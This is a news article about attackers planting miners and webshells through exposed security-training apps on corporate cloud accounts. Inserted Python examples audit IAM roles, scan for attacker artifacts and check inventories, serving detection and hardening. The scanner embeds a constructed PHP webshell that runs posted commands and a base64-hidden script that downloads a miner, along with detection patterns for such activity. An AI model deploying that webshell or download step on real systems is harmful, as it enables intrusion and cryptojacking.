LmCast :: Stay tuned in

Hackers exploit security testing apps to breach Fortune 500 firms

Recorded: Jan. 21, 2026, 3:03 p.m.

Original

Hackers exploit security testing apps to breach Fortune 500 firms

By Bill Toulas

January 21, 2026
09:00 AM

Threat actors are exploiting misconfigured web applications used for security training and internal penetration testing, such as DVWA, OWASP Juice Shop, Hackazon, and bWAPP, to gain access to cloud environments of Fortune 500 companies and security vendors.
An investigation by automated penetration testing company Pentera found evidence that attackers are using this entry point to compromise systems and deploy cryptominers, plant webshells, or pivot to more sensitive systems.
The testing apps are intentionally vulnerable, so they represent a serious compromise risk when they are exposed on the public internet and run under a privileged cloud identity.

Pentera researchers found 1,926 live, vulnerable applications exposed on the public web, often linked to overly privileged IAM (Identity and Access Management) roles and deployed on AWS, GCP, and Azure cloud environments.

Image: Overview of exposed testing web apps (Source: Pentera Labs)
According to Pentera, the exposed apps belong to multiple Fortune 500 companies, including Cloudflare, F5, and Palo Alto Networks, which received the researchers' findings and have fixed the issues.
Many of those instances exposed cloud credential sets, did not follow least-privilege recommended practices, and in more than half of the cases still used default credentials, allowing easy takeover.
The credentials Pentera discovered in the investigation could give attackers full access to S3 buckets, GCS, and Azure Blob Storage, read and write permission to Secrets Manager, interact with container registries, and gain admin access to the cloud environment.

Image: Accessing the Secrets Manager on an exposed AWS account (Source: Pentera Labs)
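To make the "overly privileged" finding concrete, here is an added example (not Pentera's tooling or code from the report) that audits IAM policy documents for exactly the permissions described above, granted on broad resources. The role and policy names, the sample documents and the list of sensitive actions are constructed for illustration; action matching follows IAM's case-insensitive wildcard semantics, and the "broad resource" test is a heuristic, not IAM's own evaluation logic.

```python
"""Audit IAM policy documents for the permissions the article describes
(object storage, Secrets Manager, registries, account admin) being granted
on broad resources. Added example, not Pentera's tooling; role names,
policy names and the sample documents are constructed.
"""
import fnmatch

# Concrete actions a leaked role credential should not have on a test box.
SENSITIVE_ACTIONS = [
    "s3:GetObject", "s3:PutObject", "s3:ListAllMyBuckets",
    "secretsmanager:GetSecretValue", "secretsmanager:PutSecretValue",
    "ecr:GetAuthorizationToken", "ecr:BatchGetImage",
    "iam:CreateAccessKey", "iam:AttachRolePolicy", "sts:AssumeRole",
]
ADMIN_MANAGED_POLICIES = {
    "arn:aws:iam::aws:policy/AdministratorAccess",
    "arn:aws:iam::aws:policy/PowerUserAccess",
}


def _as_list(value):
    """IAM lets Action/NotAction/Resource be a string or a list; normalise."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _action_matches(pattern, action):
    """IAM action matching is case-insensitive with '*' and '?' wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def _is_broad(resource):
    """Heuristic: '*' or an ARN whose wildcard covers the whole service
    (arn:aws:s3:::*) counts as broad; a single bucket prefix does not."""
    return resource == "*" or resource.rstrip("*").endswith(":")


def sensitive_actions_granted(policy_doc):
    """Return sorted SENSITIVE_ACTIONS that an Allow statement grants on a broad resource."""
    granted = set()
    for stmt in _as_list(policy_doc.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if not any(_is_broad(r) for r in _as_list(stmt.get("Resource", "*"))):
            continue
        if "NotAction" in stmt:
            # Allow + NotAction grants everything except the listed actions.
            excluded = _as_list(stmt["NotAction"])
            hits = [a for a in SENSITIVE_ACTIONS
                    if not any(_action_matches(p, a) for p in excluded)]
        else:
            patterns = _as_list(stmt.get("Action"))
            hits = [a for a in SENSITIVE_ACTIONS
                    if any(_action_matches(p, a) for p in patterns)]
        granted.update(hits)
    return sorted(granted)


def audit_role(role):
    """Return findings for one role record: {'name', 'managed_policies', 'inline_policies'}."""
    findings = []
    for arn in role.get("managed_policies", []):
        if arn in ADMIN_MANAGED_POLICIES:
            findings.append(f"{arn.rsplit('/', 1)[-1]} grants account-wide privileges")
    for name, doc in role.get("inline_policies", {}).items():
        hits = sensitive_actions_granted(doc)
        if hits:
            findings.append(f"inline policy {name} allows {', '.join(hits)} on broad resources")
    return findings


# Constructed sample roles (hypothetical names). The first mirrors the
# misconfiguration the article describes; the second is scoped correctly.
SAMPLE_ROLES = [
    {
        "name": "dvwa-lab-instance-role",
        "managed_policies": ["arn:aws:iam::aws:policy/AdministratorAccess"],
        "inline_policies": {
            "lab-storage": {"Version": "2012-10-17", "Statement": [
                {"Effect": "Allow", "Action": ["s3:*", "secretsmanager:*"], "Resource": "*"},
            ]},
        },
    },
    {
        "name": "juice-shop-lab-instance-role",
        "managed_policies": [],
        "inline_policies": {
            "lab-static-read": {"Version": "2012-10-17", "Statement": [
                {"Effect": "Allow", "Action": "s3:GetObject",
                 "Resource": "arn:aws:s3:::juice-shop-lab-static/*"},
            ]},
        },
    },
]

if __name__ == "__main__":
    for role in SAMPLE_ROLES:
        print(role["name"], audit_role(role) or ["ok"])
```

In a real account the role records would come from `iam:ListRoles`, `iam:ListAttachedRolePolicies` and `iam:GetRolePolicy`; the point of the check is that a training app's instance role should produce an empty findings list, as the second sample does.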
Active exploitation underway
In a report shared with BleepingComputer, Pentera Labs confirmed that the risk was not theoretical and that hackers have already exploited these entry points.
"During the investigation, we discovered clear evidence that attackers are actively exploiting these exact attack vectors in the wild – deploying crypto miners, webshells, and persistence mechanisms on compromised systems," the researchers said.
Proof of compromise emerged while assessing several misconfigured, vulnerable applications: the researchers established shells on the machines and enumerated data to determine who owned them.
"Out of the 616 discovered DVWA instances, around 20% were found to contain artifacts deployed by malicious actors," Pentera says in the report.
The mining activity used XMRig, which was mining Monero (XMR) in the background.

Image: Activating the XMRig miner (Source: Pentera Labs)
The researchers also found an advanced persistence mechanism built around a script named 'watchdog.sh'. If deleted, the script restores itself from a base64-encoded backup and downloads XMRig from GitHub again.

Image: Re-downloading the miner from GitHub (Source: Pentera Labs)
The script also downloads additional tools, encrypted with AES-256, from a Dropbox account, and kills competing miners present on the compromised host.
Other cases involve the deployment of a PHP webshell named ‘filemanager.php’ that supports file actions (read, write, delete, download, upload) and command execution.
The webshell contained hardcoded authentication credentials and had its timezone set to Europe/Minsk (UTC+3), a possible hint about the operators' location.
Pentera clarifies that these malicious artifacts were discovered after it had notified Cloudflare, F5, and Palo Alto Networks, and that the companies had remediated the issues.
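As an added example of how a responder would look for the artifacts just described, the script below triages a web root for a self-restoring miner script (decoding any embedded base64 backup before matching, so the "backup copy" trick does not hide the miner) and for a PHP file-manager webshell. It is not Pentera's code: the file contents, paths and the download URL are constructed, and the indicator patterns are the editor's, derived from the behaviour the article describes rather than from the real samples.

```python
"""Triage web-root files for the two artifact classes the article describes:
a self-restoring miner script that keeps a base64-encoded copy of its payload,
and a PHP file-manager webshell. Added example, not Pentera's tooling; every
file below is constructed, and the paths and URLs are hypothetical.
"""
import base64
import binascii
import re

# Indicators for the miner/persistence script described in the article.
SCRIPT_INDICATORS = {
    "xmrig": r"\bxmrig\b",
    "github_download": r"(?:curl|wget)[^\n]*github\.com",
    "dropbox_download": r"(?:curl|wget)[^\n]*dropbox\.com",
    "kills_competing_miners": r"(?:pkill|killall|kill)\b[^\n]*(?:miner|xmr|kdevtmpfsi|kinsing)",
    "self_restore": r"base64\s+(?:-d|--decode)",
}
# Indicators for a PHP webshell with the features the article lists.
PHP_INDICATORS = {
    "command_execution": r"\b(?:system|shell_exec|passthru|exec|popen|proc_open)\s*\(",
    "file_operations": r"\b(?:file_put_contents|unlink|move_uploaded_file)\s*\(",
    "hardcoded_password": r"""\$(?:pass|password|pwd)\s*=\s*['"][^'"]+['"]""",
    "timezone_pinned": r"date_default_timezone_set\s*\(",
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_blobs(text):
    """Yield the decoded text of every long base64 run that is mostly printable."""
    for match in B64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        decoded = raw.decode("utf-8", errors="ignore")
        printable = sum(c.isprintable() or c in "\n\t" for c in decoded)
        if decoded and printable / len(decoded) > 0.9:
            yield decoded


def scan_text(text, indicators):
    """Return the sorted names of indicators whose pattern matches (case-insensitive)."""
    return sorted(name for name, pattern in indicators.items()
                  if re.search(pattern, text, re.IGNORECASE))


def triage(files):
    """files: {path: content}. Return {path: [indicator, ...]} for files with hits.

    Non-PHP files are scanned twice: as written, and after decoding any
    embedded base64 blob, so a 'backup copy' of the miner does not evade grep."""
    report = {}
    for path, content in files.items():
        if path.endswith((".php", ".phtml")):
            hits = scan_text(content, PHP_INDICATORS)
        else:
            found = set(scan_text(content, SCRIPT_INDICATORS))
            for decoded in decode_blobs(content):
                found.update("encoded:" + h for h in scan_text(decoded, SCRIPT_INDICATORS))
            hits = sorted(found)
        if hits:
            report[path] = hits
    return report


# Constructed samples. The inner script is what the watchdog keeps as a
# base64 backup; the URL is a placeholder, not a real download location.
_INNER = ("#!/bin/sh\n"
          "curl -sL https://github.com/example/example/releases/download/v1/xmrig.tar.gz"
          " -o /tmp/.x/xmrig.tar.gz\n")
_BACKUP = base64.b64encode(_INNER.encode()).decode()
SAMPLE_FILES = {
    "/var/www/html/hackable/uploads/watchdog.sh": (
        "#!/bin/sh\n"
        f'BACKUP="{_BACKUP}"\n'
        "pkill -f kdevtmpfsi\n"
        '[ -f /tmp/.x/run.sh ] || echo "$BACKUP" | base64 -d > /tmp/.x/run.sh\n'
    ),
    "/var/www/html/hackable/uploads/filemanager.php": (
        "<?php\n"
        "date_default_timezone_set('Europe/Minsk');\n"
        "$password = 'constructed-sample-secret';\n"
        "if (($_POST['p'] ?? '') !== $password) { die(); }\n"
        "if (isset($_POST['cmd'])) { echo shell_exec($_POST['cmd']); }\n"
        "if (isset($_POST['rm'])) { unlink($_POST['rm']); }\n"
    ),
    "/var/www/html/index.php": "<?php echo 'DVWA lab'; ?>\n",
    "/var/www/html/deploy.sh": "#!/bin/sh\ntar xzf site.tgz -C /var/www/html\n",
}

if __name__ == "__main__":
    for path, hits in triage(SAMPLE_FILES).items():
        print(path, "->", ", ".join(hits))
```

Hits prefixed `encoded:` come only from the decoded backup, which is the signal that a plain `grep -r xmrig` over the web root would have missed. Against a real host, feed `triage` the contents of the web root plus any cron and systemd unit directories, since that is where a watchdog of this kind is usually re-launched from.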
The researchers recommend that organizations maintain a comprehensive inventory of all cloud resources, including testing apps, and isolate them from production environments.
Also, least-privilege IAM roles for non-production systems should be enforced, default credentials should be changed, and automatic expiration should be set up for temporary resources.
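One way to enforce those recommendations over a cloud inventory, as an added example rather than anything from Pentera's report: flag any test or training app that is reachable from the whole internet, carries an instance role at all, has no owner, or has no expiry tag or an expired one. The inventory records, the tag names (env, owner, expires) and the security-group rule shape are constructed assumptions modelled on an AWS EC2 export; none of the names refer to real systems.

```python
"""Check a cloud inventory against the hygiene rules the article recommends
for test and training apps: know what exists, keep it off the internet, do
not give it a cloud role, and make it expire. Added example, not Pentera's
tooling; the inventory records, tag names (env, owner, expires) and the
ingress-rule shape are constructed to resemble an AWS EC2 export.
"""
from datetime import datetime, timezone

TEST_APP_MARKERS = ("dvwa", "juice-shop", "juiceshop", "hackazon", "bwapp")
ANY_SOURCE = ("0.0.0.0/0", "::/0")


def looks_like_test_app(resource):
    """Catch test apps by tag, or by the app name in the instance name or image."""
    if resource.get("tags", {}).get("env", "").lower() in ("test", "lab", "training"):
        return True
    haystack = f"{resource.get('name', '')} {resource.get('image', '')}".lower()
    return any(marker in haystack for marker in TEST_APP_MARKERS)


def open_ports(ingress_rules):
    """Ports reachable from the whole internet, or {'*'} if all traffic is allowed.

    Each rule is {'protocol', 'from_port', 'to_port', 'cidrs'}; protocol '-1'
    means all traffic, as in an AWS security group rule."""
    ports = set()
    for rule in ingress_rules:
        if not any(cidr in ANY_SOURCE for cidr in rule.get("cidrs", [])):
            continue
        if rule.get("protocol") == "-1":
            return {"*"}
        ports.update(range(rule["from_port"], rule["to_port"] + 1))
    return ports


def evaluate(resource, now):
    """Return the policy violations for one inventory record (empty = compliant)."""
    if not looks_like_test_app(resource):
        return []
    tags = resource.get("tags", {})
    violations = []
    exposed = open_ports(resource.get("ingress", []))
    if "*" in exposed or exposed & set(resource.get("listening_ports", [])):
        violations.append("reachable from 0.0.0.0/0; restrict to VPN or office ranges")
    if resource.get("instance_role"):
        violations.append(f"carries IAM role {resource['instance_role']}; a test app needs none")
    if "owner" not in tags:
        violations.append("no owner tag; nobody to confirm it is still needed")
    expires = tags.get("expires")
    if expires is None:
        violations.append("no expires tag; schedule automatic teardown")
    else:
        # The expires tag is assumed to be a UTC calendar date, e.g. 2026-01-10.
        deadline = datetime.fromisoformat(expires).replace(tzinfo=timezone.utc)
        if deadline <= now:
            violations.append(f"expired {(now - deadline).days} day(s) ago; tear down")
    return violations


# Constructed inventory; names, images and the role are hypothetical.
NOW = datetime(2026, 1, 21, tzinfo=timezone.utc)
SAMPLE_INVENTORY = [
    {"name": "dvwa-lab-01", "image": "dvwa", "tags": {"env": "lab"},
     "instance_role": "dvwa-lab-instance-role", "listening_ports": [22, 80],
     "ingress": [{"protocol": "tcp", "from_port": 80, "to_port": 80, "cidrs": ["0.0.0.0/0"]},
                 {"protocol": "tcp", "from_port": 22, "to_port": 22, "cidrs": ["10.0.0.0/8"]}]},
    {"name": "juice-shop-training", "image": "juice-shop",
     "tags": {"env": "training", "owner": "appsec-team", "expires": "2026-01-10"},
     "instance_role": None, "listening_ports": [3000],
     "ingress": [{"protocol": "tcp", "from_port": 3000, "to_port": 3000, "cidrs": ["10.20.0.0/16"]}]},
    {"name": "bwapp-test", "image": "bwapp",
     "tags": {"env": "test", "owner": "red-team", "expires": "2026-03-01"},
     "instance_role": None, "listening_ports": [80],
     "ingress": [{"protocol": "-1", "from_port": -1, "to_port": -1, "cidrs": ["::/0"]}]},
    {"name": "payments-api-prod", "image": "payments-api",
     "tags": {"env": "prod", "owner": "payments"}, "instance_role": "payments-api-role",
     "listening_ports": [443],
     "ingress": [{"protocol": "tcp", "from_port": 443, "to_port": 443, "cidrs": ["0.0.0.0/0"]}]},
]

if __name__ == "__main__":
    for resource in SAMPLE_INVENTORY:
        for violation in evaluate(resource, NOW):
            print(f"{resource['name']}: {violation}")
```

The production record produces no findings because the rules only apply to resources identified as test apps; the value of the check is the second part of the inventory rule, that a test app is recognised from its name or image even when nobody tagged it.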
Pentera's report provides a detailed description of the steps in the investigation and includes information on the tools and methods used to discover and probe vulnerable instances, and to identify their owners.


Bill Toulas
Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.

Summarized

This report details a concerning trend: attackers are actively exploiting exposed security testing applications (DVWA, OWASP Juice Shop, Hackazon, and bWAPP) to gain unauthorized access to the cloud environments of Fortune 500 companies and security vendors. Pentera Labs found 1,926 live, vulnerable instances of these applications exposed on the public web, often linked to overly privileged Identity and Access Management (IAM) roles in Amazon Web Services (AWS), Google Cloud Platform (GCP), and Microsoft Azure. The investigation showed that these were not merely theoretical risks: the instances were being actively exploited, with tangible consequences.

Specifically, the researchers identified cryptocurrency miners (XMRig, mining Monero), webshells (a PHP file manager capable of file manipulation and command execution), and persistence mechanisms designed to reinstall the malware if it was deleted. The attackers' tooling downloaded additional components encrypted with AES-256 from a Dropbox account and killed competing miners on the host. A key element was 'watchdog.sh', a script that restores itself from a base64-encoded backup and re-downloads XMRig from GitHub. The webshell, 'filemanager.php', used hardcoded authentication credentials and had its timezone set to Europe/Minsk (UTC+3), a potential clue about the origin of the attackers.

Organizations affected included Cloudflare, F5, and Palo Alto Networks, which were notified by Pentera and remediated the issues. The report underscores the importance of maintaining a comprehensive inventory of all cloud resources, including security testing applications, and isolating them from production environments. The researchers also recommend least-privilege IAM roles for non-production systems, changing default credentials, and setting automatic expiration for temporary cloud resources.

The active exploitation Pentera discovered highlights serious weaknesses in basic security hygiene and shows that malicious actors will readily abuse intentionally vulnerable tools left exposed. Nothing in the report suggests a targeted campaign: the payloads were commodity miners and webshells, and roughly a fifth of the 616 DVWA instances carried attacker artifacts. It was the researchers, not the attackers, who established shells and enumerated data on the instances to identify their owners. The lesson for organizations is to proactively find and fix exposed, misconfigured test deployments, recognizing that even a seemingly innocuous training application becomes a real foothold when it runs on an internet-facing host with a privileged cloud role. The persistence the attackers built in, with self-restoring scripts and re-downloads from public hosting, underscores the need for security monitoring and incident response coverage that extends to non-production infrastructure.